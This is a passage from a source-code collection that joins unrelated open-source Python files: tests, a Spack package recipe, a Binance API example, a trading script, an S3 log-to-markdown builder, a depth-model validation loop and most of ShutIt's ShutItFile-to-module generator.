m = match_standard_transaction_at_any_index(gen1)
assert m == (EXPECTED_START, EXPECTED_END)
m = match_standard_transaction_at_any_index(b"\xff" + gen1 + b"\x80")
assert m == (EXPECTED_START + 1, EXPECTED_END + 1)
m = match_standard_transaction_at_any_index(gen1[47:])
assert m is None
def test_match_transaction(self):
# match_standard_transaction_exactly_and_return_pubkey(transaction: bytes) -> Optional[bytes]:
m = match_standard_transaction_exactly_and_return_pubkey(STANDARD_TRANSACTION_1)
assert m == hexstr_to_bytes(
"b0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
)
m = match_standard_transaction_exactly_and_return_pubkey(STANDARD_TRANSACTION_1 + b"\xfa")
assert m is None
m = match_standard_transaction_exactly_and_return_pubkey(b"\xba" + STANDARD_TRANSACTION_1 + b"\xfa")
assert m is None
m = match_standard_transaction_exactly_and_return_pubkey(b"\xba" + STANDARD_TRANSACTION_1)
assert m is None
m = match_standard_transaction_exactly_and_return_pubkey(
gen1[EXPECTED_START : EXPECTED_END + PUBKEY_PLUS_SUFFIX]
)
assert m == hexstr_to_bytes(
"b081963921826355dcb6c355ccf9c2637c18adf7d38ee44d803ea9ca41587e48c913d8d46896eb830aeadfc13144a8eac3"
)
m = match_standard_transaction_exactly_and_return_pubkey(gen1)
assert m is None
|
cx_Freeze/samples/find_spec/dummypackage/dummymodule.py | lexa/cx_Freeze | 358 | 12609822 | print("Hi, I'm a module!")
raise Exception(
"This module-level exception should also not occur during freeze"
)
|
var/spack/repos/builtin/packages/bat/package.py | kkauder/spack | 2,360 | 12609834 |
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Bat(Package):
"""A cat(1) clone with wings."""
homepage = 'https://github.com/sharkdp/bat'
url = 'https://github.com/sharkdp/bat/archive/v0.13.0.tar.gz'
version('0.13.0', sha256='f4aee370013e2a3bc84c405738ed0ab6e334d3a9f22c18031a7ea008cd5abd2a')
version('0.12.1', sha256='1dd184ddc9e5228ba94d19afc0b8b440bfc1819fef8133fe331e2c0ec9e3f8e2')
depends_on('rust')
def install(self, spec, prefix):
cargo = which('cargo')
cargo('install', '--root', prefix, '--path', '.')
|
tools/style_variable_generator/find_invalid_css_variables_test.py | mghgroup/Glide-Browser | 575 | 12609845 | # Copyright 2020 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from find_invalid_css_variables import FindInvalidCSSVariables
import unittest
class FindInvalidCSSVariablesTest(unittest.TestCase):
def testUnspecified(self):
def GitResult(command):
return '''--test-not-specified
--test-only-rgb-used-rgb
--test-toolbar'''
json_string = '''
{
options: {
CSS: {
prefix: 'test'
}
},
colors: {
toolbar: "rgb(255, 255, 255)",
only_rgb_used: "rgb(255, 255, 255)",
}
}
'''
result = FindInvalidCSSVariables(json_string,
'test',
git_runner=GitResult)
unused = set()
self.assertEqual(result['unused'], unused)
unspecified = set(['--test-not-specified'])
self.assertEqual(result['unspecified'], unspecified)
def testUnused(self):
def GitResult(command):
return '''--test-toolbar'''
json_string = '''
{
options: {
CSS: {
prefix: 'test'
}
},
colors: {
toolbar: "rgb(255, 255, 255)",
unused: "rgb(255, 255, 255)",
}
}
'''
result = FindInvalidCSSVariables(json_string,
'test',
git_runner=GitResult)
unused = set(['--test-unused'])
self.assertEqual(result['unused'], unused)
unspecified = set()
self.assertEqual(result['unspecified'], unspecified)
def testNoPrefix(self):
def GitResult(command):
return ''
json_string = '''
{
colors: {
toolbar: "rgb(255, 255, 255)",
}
}
'''
self.assertRaises(KeyError,
FindInvalidCSSVariables,
json_string,
'test',
git_runner=GitResult)
if __name__ == '__main__':
unittest.main()
|
examples/spot/wallet/trade_fee.py | Banging12/binance-connector-python | 512 | 12609847 |
#!/usr/bin/env python
import logging
from binance.spot import Spot as Client
from binance.lib.utils import config_logging
config_logging(logging, logging.DEBUG)
key = ""
secret = ""
spot_client = Client(key, secret)
logging.info(spot_client.trade_fee())
|
examples/gm_realtime.py | xf1688/czsc | 206 | 12609848 |
# -*- coding: utf-8 -*-
"""
author: zengbin93
email: <EMAIL>
create_dt: 2021/12/13 17:48
describe: live trading simulation for A-share stocks
Environment variables:
    strategy_id       JueJin (gm) research strategy ID
    account_id        account ID
    wx_key            WeCom group-chat bot key
    max_sym_pos       position limit per symbol
    path_gm_logs      path to gm_logs, default: C:/gm_logs
Example of setting the environment variables:
    # set them with the os module
os.environ['strategy_id'] = 'c7991760-****-11eb-b66a-00163e0c87d1'
os.environ['account_id'] = '<KEY>'
os.environ['wx_key'] = '<KEY>'
os.environ['max_sym_pos'] = '0.5'
os.environ['path_gm_logs'] = 'C:/gm_logs'
"""
from czsc.gm_utils import *
from czsc.strategies import trader_strategy_a as strategy
def init(context):
symbols = [
'SZSE.300014',
'SHSE.600143',
'SZSE.002216',
'SZSE.300033',
'SZSE.000795',
'SZSE.002739',
'SHSE.600000',
'SHSE.600008',
'SHSE.600006',
'SHSE.600009',
'SHSE.600010',
'SHSE.600011'
]
name = f"{strategy.__name__}"
init_context_universal(context, name)
init_context_env(context)
init_context_traders(context, symbols, strategy)
init_context_schedule(context)
if __name__ == '__main__':
run(filename=os.path.basename(__file__), token=gm_token, mode=MODE_LIVE, strategy_id=os.environ['strategy_id'])
|
mayan/apps/authentication/__init__.py | eshbeata/open-paperless | 2,743 | 12609857 | from __future__ import unicode_literals
default_app_config = 'authentication.apps.AuthenticationApp'
|
03_regression/src/spark_kaggle_starter/logging_lib/MarkdownBuilder.py | austinfrazer/GWU_data_mining | 229 | 12609863 | import logging
import os
import io
from datetime import datetime
import boto3
from boto3.s3.transfer import S3Transfer
import botocore
import platform
class MarkdownBuilder(object):
"""
A class for logging code output and matplotlib plots in AWS S3. Only ONE
object should be instantiated per script so that results stay consolidated.
"""
def __init__(self, profile_name = 'default', s3_bucket = 'emr-related-files',s3_bucket_path='job_logs/',app_name='MyApp',path_to_save_logs_local=os.path.dirname(__file__)+'/logs'):
self.s3_bucket = s3_bucket # S3 Bucket to use for storage
self.profile_name = profile_name # Define IAM profile name (see: http://boto3.readthedocs.io/en/latest/guide/configuration.html)(config file located at user folder .aws directory)
self.s3_bucket_path = s3_bucket_path #The path to store the logs in your bucket (must end in a '/' because it's a directory)
self.app_name = app_name #The name of your app
self.path_to_save_logs_local = path_to_save_logs_local #A path to save all the built logs on your local machine.
def get_datetime_str(self):
"""
Gets a formated datetime string for naming purposes.
"""
return datetime.now().strftime("%Y%m%d.%H:%M:%S.%f")
def log_string(self,string):
s3 = boto3.resource('s3')
bucket = s3.Bucket(self.s3_bucket)
path = self.get_path_for_new_log()
bucket.put_object(Body=string, ContentType='text/plain', Key=path)
def build_markdowns(self):
s3 = boto3.resource('s3')
bucket = s3.Bucket(self.s3_bucket)
result = bucket.meta.client.list_objects_v2(Bucket=bucket.name,
Delimiter='/', Prefix=self.s3_bucket_path+'unbuilt/')
for o in result.get('CommonPrefixes'):
prefix = o.get('Prefix') #example: job_logs/unbuilt/MyApp&&&20170607.00:54:28.355680/
splits = prefix.split('/')
folder_name = splits[-2]
splits2 = folder_name.split('&&&')
app_name = splits2[0]
timestamp = splits2[1]
result_inner = bucket.meta.client.list_objects_v2(Bucket=bucket.name,
Prefix=prefix)
objects_to_delete = []
#Start making the first unbuilt markdown file
markdown_str = 'Logs for ' + app_name + ' executed on ' +timestamp + ':\n'
built_file_directory = self.s3_bucket_path + 'built/' + app_name + '/'+timestamp
for o2 in result_inner.get('Contents'):
key = o2.get('Key')
key_split = key.split('/')
filename, file_extension = os.path.splitext(key_split[-1])
#Get ride of characters that are bad for windows files
filename = filename.replace(':','').replace('.','')
#This file will be deleted later
objects_to_delete.append({'Key':key})
#Download the file
obj = s3.Object(bucket, key)
if file_extension in ['.png','.jpg']:
#its a plot or image
if self.path_to_save_logs_local != False:
file_path = self.path_to_save_logs_local+'/'+app_name+'/'+timestamp.replace(':','').replace('.','')+'/data/'
if platform.system() == 'Windows':
file_path = file_path.replace('/','\\').replace(':','.')
#Make the directory if it doesnt exist
if not os.path.exists(file_path):
os.makedirs(file_path)
transfer = S3Transfer(boto3.client('s3'))
#download the file to a local location
transfer.download_file(self.s3_bucket,key,file_path+filename+file_extension)
markdown_str += '![{image_name}]({relative_path})'.format(image_name=filename,relative_path='data/'+filename+file_extension) + '\n'
else:
file_content = boto3.client('s3').get_object(Bucket=self.s3_bucket,Key=key)['Body'].read().decode('UTF-8')
print(file_content)
markdown_str += "<p style='white-space: nowrap;'>`"+str(file_content)+'`</p>'+'\n'
s3.Object(self.s3_bucket,built_file_directory+'/data/'+filename+file_extension).copy_from(CopySource=self.s3_bucket+'/'+key)
bucket.put_object(Body=markdown_str, ContentType='text/plain', Key=built_file_directory+'/log.md')
if self.path_to_save_logs_local != False:
file_path = self.path_to_save_logs_local+'/'+app_name+'/'+timestamp.replace(':','').replace('.','')
if platform.system() == 'Windows':
file_path = file_path.replace('/','\\').replace(':','.')
#Make the directory if it doesnt exist
if not os.path.exists(file_path):
os.makedirs(file_path)
file = open(file_path+'/log.md','w')
file.write(markdown_str)
file.close()
#delete the old files now that they have been moved to built
bucket.delete_objects(Delete={'Objects':objects_to_delete})
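# Example usage (an illustrative sketch; the bucket, prefix and app name are
# placeholders, valid AWS credentials are assumed, and log_string() relies on a
# get_path_for_new_log() helper that is not shown in this file):
#
#     builder = MarkdownBuilder(s3_bucket='emr-related-files', app_name='MyApp')
#     builder.log_string('step 1 finished')   # uploads one unbuilt log entry to S3
#     builder.build_markdowns()               # collates unbuilt entries into log.md reports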
|
depth/val_dlsm.py | zhaoxiaodong95/lsm | 255 | 12609893 |
import argparse
import logging
import os.path as osp
import time
import numpy as np
import tensorflow as tf
from tqdm import tqdm
from config import SHAPENET_IM
from evaluate import eval_l1_err, print_depth_stats
from loader import pad_batch
from models import grid_nets, im_nets, model_dlsm
from mvnet import MVNet
from ops import conv_rnns
from shapenet import ShapeNet
from tensorboard_logging import TensorboardLogger
from utils import get_session_config, init_logging, mkdir_p, process_args
def tensorboard_log(stats, tbd, step):
tbd.log_scalar('masked_l1_err', np.mean(stats), step)
def validate(args, checkpoint):
net = MVNet(
vmin=-0.5,
vmax=0.5,
vox_bs=args.val_batch_size,
im_bs=args.val_im_batch,
grid_size=args.nvox,
im_h=args.im_h,
im_w=args.im_w,
mode="TEST",
norm=args.norm)
im_dir = SHAPENET_IM
# Setup network
net = model_dlsm(
net,
im_nets[args.im_net],
grid_nets[args.grid_net],
conv_rnns[args.rnn],
im_skip=args.im_skip,
ray_samples=args.ray_samples,
sepup=args.sepup,
proj_x=args.proj_x,
proj_last=True)
sess = tf.Session(config=get_session_config())
saver = tf.train.Saver()
saver.restore(sess, checkpoint)
coord = tf.train.Coordinator()
# Init dataset
dset = ShapeNet(im_dir=im_dir, split_file=args.val_split_file, rng_seed=1)
mids = dset.get_smids('val')
logging.info('Validating %d models', len(mids))
items = ['shape_id', 'model_id', 'im', 'K', 'R', 'depth']
dset.init_queue(
mids,
args.val_im_batch,
items,
coord,
nepochs=1,
qsize=32,
nthreads=args.prefetch_threads)
# Init stats
l1_err = []
# Testing loop
pbar = tqdm(desc='Validating', total=len(mids))
deq_mids, deq_sids = [], []
try:
while not coord.should_stop():
batch_data = dset.next_batch(items, net.batch_size)
if batch_data is None:
continue
deq_sids.append(batch_data['shape_id'])
deq_mids.append(batch_data['model_id'])
num_batch_items = batch_data['K'].shape[0]
batch_data = pad_batch(batch_data, args.val_batch_size)
feed_dict = {
net.K: batch_data['K'],
net.Rcam: batch_data['R'],
net.ims: batch_data['im']
}
pred = sess.run(net.depth_out, feed_dict=feed_dict)
batch_err = eval_l1_err(pred[:num_batch_items],
batch_data['depth'][:num_batch_items])
l1_err.extend(batch_err)
pbar.update(num_batch_items)
except Exception as e:
logger.error(repr(e))
dset.close_queue(e)
finally:
pbar.close()
sess.close()
logger.info('Validation completed')
coord.join()
deq_mids = np.concatenate(deq_mids, axis=0)[..., 0].tolist()
deq_sids = np.concatenate(deq_sids, axis=0)[..., 0].tolist()
# Print statistics and save to file
stats, stats_table = print_depth_stats(zip(deq_sids, deq_mids), l1_err)
return stats, stats_table
def parse_args():
parser = argparse.ArgumentParser(description='Options for MVNet')
parser.add_argument('--log', type=str, default=None)
parser.add_argument('--val_batch_size', type=int, default=4)
parser.add_argument('--val_im_batch', type=int, default=4)
parser.add_argument('--loglevel', type=str, default='info')
parser.add_argument(
'--val_split_file', type=str, default='data/splits.json')
parser.add_argument('--prefetch_threads', type=int, default=2)
parser.add_argument('--sleep_time', type=int, default=15)
args = process_args(parser)
return args
if __name__ == '__main__':
args = parse_args()
init_logging(args.loglevel)
logger = logging.getLogger('mview3d.' + __name__)
logger.info('Starting validation @ %s', args.log)
# Initialize tensorboard logger
mkdir_p(osp.join(args.log, 'val'))
tbd_logger = TensorboardLogger(log_dir=osp.join(args.log, 'val'))
processed = []
while True:
tf.reset_default_graph()
latest_checkpoint = tf.train.latest_checkpoint(args.log)
if latest_checkpoint is None or latest_checkpoint in processed:
time.sleep(args.sleep_time * 60)
logger.info('Checking for new checkpoints')
continue
step = int(osp.basename(latest_checkpoint).split('-')[-1])
logger.info('Validate %s', latest_checkpoint)
val_stats, table = validate(args, latest_checkpoint)
tensorboard_log(val_stats, tbd_logger, step)
processed.append(latest_checkpoint)
logging.info(table)
if step >= args.niters:
logging.info('Finished training/validation for %d iterations',
args.niters)
break
|
shutit_patterns/shutitfile.py | controlplaneio/shutit | 2,063 | 12609896 |
#!/usr/bin/env python
# The MIT License (MIT)
#
# Copyright (C) 2014 OpenBet Limited
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is furnished to do
# so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import print_function
import logging
import os
import random
import re
import shutil
import sys
try:
from urllib.parse import urlparse
from urllib.request import urlopen
except ImportError:
from urlparse import urlparse
from urllib2 import urlopen
from six import iteritems
import shutit_global
import shutit_skeleton
def setup_shutitfile_pattern(shutit,
skel_path,
skel_delivery,
skel_pattern,
skel_domain,
skel_module_name,
skel_vagrant_num_machines,
skel_vagrant_machine_prefix,
skel_vagrant_ssh_access,
skel_vagrant_docker):
shutit_skeleton_extra_args = ''
if skel_pattern == 'shutitfile' and skel_delivery == 'vagrant':
# This is a vagrant build, adjust accordingly.
skel_pattern = 'vagrant'
skel_delivery = 'bash'
if skel_vagrant_num_machines is not None:
shutit_skeleton_extra_args += ' --vagrant_num_machines ' + skel_vagrant_num_machines
else:
shutit_skeleton_extra_args += ' --vagrant_num_machines 3'
if skel_vagrant_machine_prefix is not None:
shutit_skeleton_extra_args += ' --vagrant_machine_prefix ' + skel_vagrant_machine_prefix
else:
shutit_skeleton_extra_args += ' --vagrant_machine_prefix machine'
if skel_vagrant_ssh_access is True:
shutit_skeleton_extra_args += ' --vagrant_ssh_access'
if skel_vagrant_docker is True:
shutit_skeleton_extra_args += ' --vagrant_docker'
if skel_pattern == 'shutitfile' and skel_delivery == 'docker':
# This is a docker build, adjust accordingly.
skel_pattern = 'docker'
skel_delivery = 'docker'
runsh_filename = skel_path + '/run.sh'
runsh_file = open(runsh_filename,'w+')
runsh_file.write('''#!/bin/bash
set -e
MODULE_NAME="''' + skel_module_name + '''"
DIR="/tmp/shutit_built''' + skel_path + '''"
DOMAIN="''' + skel_domain + '''"
DELIVERY="''' + skel_delivery + '''"
PATTERN="''' + skel_pattern + '''"
rm -rf $DIR
shutit skeleton --shutitfile ShutItFile1.sf ShutItFile2.sf --name ${DIR} --domain ${DOMAIN} --delivery ${DELIVERY} --pattern ${PATTERN}''' + shutit_skeleton_extra_args + '''
if [[ ${DELIVERY} == 'bash' ]]
then
cd $DIR && ./run.sh "$@"
elif [[ ${DELIVERY} == 'docker' ]]
then
cd $DIR && ./build.sh "$@"
fi''')
runsh_file.close()
os.chmod(runsh_filename,0o755)
# User message
shutit.log('''# Run:
cd ''' + skel_path + ''' && ./run.sh
# to run.
# Or
# cd ''' + skel_path + ''' && ./run.sh -c
# to run while choosing modules to build. ''',transient=True)
# ShutItFile1
shutitfile1_filename = skel_path + '/ShutItFile1.sf'
shutitfile1_file = open(shutitfile1_filename,'w+')
shutitfile1_contents = '''# See [here](https://github.com/ianmiell/shutitfile/blob/master/CheatSheet.md) for a cheat sheet.
# See [here](https://github.com/ianmiell/shutitfile/examples) for examples.'''
shutitfile1_file.write(shutitfile1_contents)
shutitfile1_file.close()
# ShutItFile2.sf
shutitfile2_filename = skel_path + '/ShutItFile2.sf'
shutitfile2_file = open(shutitfile2_filename,'w+')
shutitfile2_contents = '''# See [here](https://github.com/ianmiell/shutitfile/blob/master/CheatSheet.md) for a cheat sheet.
# See [here](https://github.com/ianmiell/shutitfile/examples) for examples.'''
shutitfile2_file.write(shutitfile2_contents)
shutitfile2_file.close()
# Parses the shutitfile (passed in as a string)
# and info to extract, and returns a list with the information in a more canonical form, still ordered.
def parse_shutitfile(contents):
ret = []
full_line = ''
for line in contents.split('\n'):
line = line.strip()
# Handle continuations
if line:
if line[-1] == '\\':
full_line += line[0:-1]
continue
else:
full_line += line
if re.match(r"^IF_NOT+[\s]+([A-Z_]+)[\s]+(.*)$", full_line):
m = re.match(r"^IF_NOT+[\s]+([A-Z_]+)[\s]+(.*)$", full_line)
ret.append(['IF_NOT',m.group(1),m.group(2)])
elif re.match(r"^STORE_RUN+[\s]+([a-zA-Z0-9_]+)[\s]+(.*)$", full_line):
m = re.match(r"^STORE_RUN+[\s]+([a-zA-Z0-9_]+)[\s]+(.*)$", full_line)
ret.append(['STORE_RUN',m.group(1),m.group(2)])
elif re.match(r"^ELIF_NOT[\s]+([A-Z_]+)[\s]+(.*)$", full_line):
m = re.match(r"^ELIF_NOT[\s]+([A-Z_]+)[\s]+(.*)$", full_line)
ret.append(['ELIF_NOT',m.group(1),m.group(2)])
elif re.match(r"^IF[\s]+([A-Z_]+)[\s]+(.*)$", full_line):
m = re.match(r"^IF[\s]+([A-Z_]+)[\s]+(.*)$", full_line)
ret.append(['IF',m.group(1),m.group(2)])
elif re.match(r"^ELIF[\s]+([A-Z_]+)[\s]+(.*)$", full_line):
m = re.match(r"^ELIF[\s]+([A-Z_]+)[\s]+(.*)$", full_line)
ret.append(['ELIF',m.group(1),m.group(2)])
elif re.match("^ELSE$", full_line):
ret.append(['ELSE'])
elif re.match("^ENDIF$", full_line):
ret.append(['ENDIF'])
elif re.match(r"^([A-Za-z_]+)[\s]*(.*)$", full_line):
m = re.match(r"^[\s]*([A-Za-z_]+)[\s]*(.*)$", full_line)
ret.append([m.group(1), m.group(2)])
elif re.match("^#(.*)$", full_line):
# Comments should be added with 'COMMENT a comment'
pass
else:
full_line_split = ''.join((full_line[:10000].split()))
full_line_strings = ''.join(re.findall("[^\x00-\x1F\x7F-\xFF]", full_line_split))
shutit_global.shutit_global_object.shutit_print('FAILED TO PARSE: ' + full_line_strings[:30] + '[...]')
return [], False
full_line = ''
return ret, True
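# Worked example, derived from the regexes above:
#
#     >>> parse_shutitfile("RUN echo hello\nIF FILE_EXISTS /tmp/x\nENDIF")
#     ([['RUN', 'echo hello'], ['IF', 'FILE_EXISTS', '/tmp/x'], ['ENDIF']], True)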
def parse_shutitfile_args(args_str):
"""Parse shutitfile args (eg in the line 'RUN some args', the passed-in args_str would be 'some args').
If the string is bounded by square brackets, then it's treated in the form: ['arg1','arg2'], and the returned list looks the same.
If the string composed entirely of name-value pairs (eg RUN a=b c=d) then it's returned as a dict (eg {'a':'b','c':'d'}).
If what's passed-in is of the form: "COMMAND ['a=b','c=d']" then a dict is also returned.'
Also eg: ["asd and space=value","asd 2=asdgasdg"]"""
ret = []
if args_str == '':
return ret
if args_str[0] == '[' and args_str[-1] == ']':
ret = eval(args_str)
assert isinstance(ret, list)
else:
ret = args_str.split()
# if all the items have a = in them, then return a dict of nv pairs
nv_pairs = True
for item in ret:
if item.find('=') < 0:
nv_pairs = False
if nv_pairs:
d = {}
for item in ret:
item_nv = item.split('=')
d.update({item_nv[0]:item_nv[1]})
ret = d
return ret
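# Worked examples, derived from the parsing rules above:
#
#     >>> parse_shutitfile_args("some args")
#     ['some', 'args']
#     >>> parse_shutitfile_args("a=b c=d")
#     {'a': 'b', 'c': 'd'}
#     >>> parse_shutitfile_args("['arg1','arg2']")
#     ['arg1', 'arg2']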
# Takes a shutitfile filename and returns represention of that Dockerfile as a ShutIt module snippets
def shutitfile_to_shutit_module(shutit,
skel_shutitfile,
skel_path,
skel_domain,
skel_module_name,
skel_domain_hash,
skel_delivery,
skel_depends,
order,
total,
skel_module_modifier):
if not os.path.exists(skel_shutitfile):
if urlparse(skel_shutitfile)[0] == '':
shutit.fail('Dockerfile/ShutItFile "' + skel_shutitfile + '" must exist')
shutitfile_contents = urlopen(skel_shutitfile).read()
shutitfile_dirname = None
else:
shutitfile_contents = open(skel_shutitfile).read()
shutitfile_dirname = os.path.dirname(skel_shutitfile)
if shutitfile_dirname == '':
shutitfile_dirname = './'
if os.path.exists(shutitfile_dirname):
if os.path.exists(skel_path + '/context'):
shutil.rmtree(skel_path + '/context')
shutil.copytree(shutitfile_dirname, skel_path + '/context')
else:
# Copy any other files that do not already exist on the target
os.system('cp -r -n ' + shutitfile_dirname + '/* ' + skel_path)
# Change to this context
os.chdir(shutitfile_dirname)
# Process the shutitfile
shutitfile_representation, ok = shutit_skeleton.process_shutitfile(shutit, shutitfile_contents)
if not ok:
return '', '', '', '', '', False
# Check the shutitfile representation
check_shutitfile_representation(shutit, shutitfile_representation, skel_delivery)
# Get the shutit module as a string
sections, module_id, _, depends, default_include = generate_shutit_module_sections(shutit, shutitfile_representation, skel_domain, skel_module_name, skel_module_modifier, skel_shutitfile, skel_depends, order, total)
if module_id == skel_module_name:
module_id = skel_domain + """.""" + skel_module_name + skel_module_modifier
# Final section
final_section = """
def module():
return """ + skel_module_name + skel_module_modifier + """(
'""" + module_id + """', """ + skel_domain_hash + str(order * 0.0001) + str(random.randint(1,999)) + """,
description='""" + shutitfile_representation['shutitfile']['description'] + """',
delivery_methods=[('""" + skel_delivery + """')],
maintainer='""" + shutitfile_representation['shutitfile']['maintainer'] + """',
depends=[""" + depends + """]
)
"""
sections.update({'final_section':final_section})
# Return program to main shutit_dir
if shutitfile_dirname:
os.chdir(sys.path[0])
return sections, module_id, skel_module_name, default_include, ok
def check_shutitfile_representation(shutit, shutitfile_representation, skel_delivery):
# delivery directives
# Only allow one type of delivery
shutitfile_delivery = set()
# If we've been given a delivery method, add that.
if skel_delivery:
shutitfile_delivery.add(skel_delivery)
for item in shutitfile_representation['shutitfile']['delivery']:
shutitfile_delivery.add(item[1])
if len(shutitfile_delivery) > 1:
shutit.fail('Conflicting delivery methods in ShutItFile')
elif len(shutitfile_delivery) == 1:
skel_delivery = shutitfile_delivery.pop()
else:
# Default skel_delivery to bash if none seen
skel_delivery = 'bash'
if skel_delivery not in shutit_global.shutit_global_object.allowed_delivery_methods:
shutit.fail('Disallowed delivery method in ShutItFile: ' + skel_delivery)
if skel_delivery != 'docker':
# FROM, ONBUILD, VOLUME, EXPOSE, ENTRYPOINT, CMD, COMMIT, PUSH are verboten
failed = False
if shutitfile_representation['shutitfile']['cmd'] != '' or shutitfile_representation['shutitfile']['volume'] != [] or shutitfile_representation['shutitfile']['onbuild'] != [] or shutitfile_representation['shutitfile']['expose'] != [] or shutitfile_representation['shutitfile']['entrypoint'] != []:
failed = True
for item in shutitfile_representation['shutitfile']['script']:
if item[0] in ('PUSH','COMMIT'):
failed = True
break
if failed:
shutit.fail('One of FROM, ONBUILD, VOLUME, EXPOSE, ENTRYPOINT or CMD, COMMIT, PUSH used in ShutItFile not using the Docker delivery method.')
def generate_shutit_module_sections(shutit,
shutitfile_representation,
skel_domain,
skel_module_name,
skel_module_modifier,
skel_shutitfile,
skel_depends,
order,
total):
sections = {}
sections.update({'header_section':'\n# Created from shutitfile: ' + skel_shutitfile + '\n# Maintainer: ' + shutitfile_representation['shutitfile']['maintainer'] + '\nfrom shutit_module import ShutItModule\n\nclass ' + skel_module_name + skel_module_modifier + '(ShutItModule):\n\n\tdef is_installed(self, shutit):\n\t\treturn False'})
# config section - this must be done first, as it collates the config
# items that can be referenced later
config_section = ''
if shutitfile_representation['shutitfile']['module_id']:
module_id = shutitfile_representation['shutitfile']['module_id']
else:
# If the total number of modules is more than 1, then we want to number these modules.
if total > 1:
module_id = '%s.%s.%s_%s' % (skel_domain, skel_module_name, skel_module_name, str(order))
else:
module_id = '%s.%s.%s' % (skel_domain, skel_module_name, skel_module_name)
build = ''
for item in shutitfile_representation['shutitfile']['config']:
build += handle_shutitfile_config_line(item)
if build:
config_section += '\n\t\t' + build
sections.update({'config_section':config_section})
# build
build = ''
numpushes = 0
numlogins = 0
ifdepth = 0
wgetgot = False
current_note = ''
# section is the section of the shutitfile we're in. Default is 'build', but there are also a few others.
section = 'build'
build_section = ''
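# Walk the script once; shutitfile_get_section flips 'section' whenever a
# *_BEGIN/*_END marker is seen, so only lines belonging to the build section
# are translated in this pass.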
for item in shutitfile_representation['shutitfile']['script']:
section = shutitfile_get_section(item[0], section)
if section == 'build':
ret = handle_shutitfile_script_line(shutit, item, numpushes, wgetgot, numlogins, ifdepth, current_note)
build += ret[0]
numpushes = ret[1]
wgetgot = ret[2]
numlogins = ret[3]
ifdepth = ret[4]
current_note = ret[5]
build_section += build
while numpushes > 0:
build_section += '''\n\t\tshutit.send('popd')'''
numpushes -= 1
while numlogins > 0:
build_section += '''\n\t\tshutit.logout()'''
numlogins -= 1
if ifdepth != 0:
shutit.fail('Unbalanced IFs in ' + section + ' section')
sections.update({'build_section':build_section})
# finalize section
finalize = ''
for line in shutitfile_representation['shutitfile']['onbuild']:
finalize += '\n\n\t\tshutit.send(\'' + line + '\')'
sections.update({'finalize_section':finalize})
# test section
build = ''
test_section = ''
numpushes = 0
numlogins = 0
ifdepth = 0
current_note = ''
for item in shutitfile_representation['shutitfile']['script']:
section = shutitfile_get_section(item[0], section)
if section == 'test':
ret = handle_shutitfile_script_line(shutit, item, numpushes, wgetgot, numlogins, ifdepth, current_note)
build += ret[0]
numpushes = ret[1]
wgetgot = ret[2]
numlogins = ret[3]
ifdepth = ret[4]
current_note = ret[5]
if build:
test_section += '\n\t\t' + build
while numpushes > 0:
test_section += """\n\t\tshutit.send('popd')"""
numpushes -= 1
while numlogins > 0:
test_section += '''\n\t\tshutit.logout()'''
numlogins -= 1
sections.update({'test_section':test_section})
# isinstalled section
build = ''
isinstalled_section = ''
numpushes = 0
numlogins = 0
ifdepth = 0
current_note = ''
for item in shutitfile_representation['shutitfile']['script']:
section = shutitfile_get_section(item[0], section)
if section == 'isinstalled':
ret = handle_shutitfile_script_line(shutit, item, numpushes, wgetgot, numlogins, ifdepth, current_note)
build += ret[0]
numpushes = ret[1]
wgetgot = ret[2]
numlogins = ret[3]
ifdepth = ret[4]
current_note = ret[5]
if build:
isinstalled_section += '\n\t\t' + build
while numpushes > 0:
isinstalled_section += """\n\t\tshutit.send('popd')"""
numpushes -= 1
while numlogins > 0:
isinstalled_section += '''\n\t\tshutit.logout()'''
numlogins -= 1
if ifdepth != 0:
shutit.fail('Unbalanced IFs in ' + section + ' section')
sections.update({'isinstalled_section':isinstalled_section})
# start section
build = ''
start_section = ''
numpushes = 0
numlogins = 0
ifdepth = 0
current_note = ''
for item in shutitfile_representation['shutitfile']['script']:
section = shutitfile_get_section(item[0], section)
if section == 'start':
ret = handle_shutitfile_script_line(shutit, item, numpushes, wgetgot, numlogins, ifdepth, current_note)
build += ret[0]
numpushes = ret[1]
wgetgot = ret[2]
numlogins = ret[3]
ifdepth = ret[4]
current_note = ret[5]
if build:
start_section += '\n\t\t' + build
while numpushes > 0:
start_section += """\n\t\tshutit.send('popd')"""
numpushes -= 1
while numlogins > 0:
start_section += '''\n\t\tshutit.logout()'''
numlogins -= 1
if ifdepth != 0:
shutit.fail('Unbalanced IFs in ' + section + ' section')
sections.update({'start_section':start_section})
# stop section
build = ''
stop_section = ''
numpushes = 0
numlogins = 0
ifdepth = 0
current_note = ''
for item in shutitfile_representation['shutitfile']['script']:
section = shutitfile_get_section(item[0], section)
if section == 'stop':
ret = handle_shutitfile_script_line(shutit, item, numpushes, wgetgot, numlogins, ifdepth, current_note)
build += ret[0]
numpushes = ret[1]
wgetgot = ret[2]
numlogins = ret[3]
ifdepth = ret[4]
current_note = ret[5]
if build:
stop_section += '\n\t\t' + build
while numpushes > 0:
stop_section += """\n\t\tshutit.send('popd')"""
numpushes -= 1
while numlogins > 0:
stop_section += '''\n\t\tshutit.logout()'''
numlogins -= 1
if ifdepth != 0:
shutit.fail('Unbalanced IFs in ' + section + ' section')
